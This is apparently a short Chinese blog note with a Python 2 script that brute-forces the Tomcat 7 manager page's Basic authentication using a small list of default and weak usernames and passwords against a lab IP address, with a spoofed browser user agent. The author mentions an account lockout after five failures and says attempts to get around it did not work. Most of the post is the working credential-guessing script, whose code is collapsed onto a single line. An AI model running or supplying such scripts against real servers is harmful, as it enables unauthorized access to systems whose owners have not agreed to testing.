Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。
测试环境:Tomcat版本 7.0
登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包
据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。
目前只能用于简单的弱口令测试
Python脚本如下:
import urllib import urllib2 import time import base64 names=['admin','tomcat'] passwds=['','admin','tomcat','123456','root'] for name in names: name=name.rstrip() for passwd in passwds: passwd=passwd.rstrip() user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)" Authorization = "Basic %s" % (base64.b64encode(name+':'+passwd)) header = { 'User-Agent' : user_agent , 'Authorization':Authorization} try: url = "http://192.168.106.137:8080/manager/html" request = urllib2.Request(url,headers=header) response = urllib2.urlopen(request,timeout=5) result=response.read() if response.code ==200: print '[Success] ' + url+' '+name+':'+passwd
break except: print '[false111] ' + url+' '+name+':'+passwd time.sleep(1)
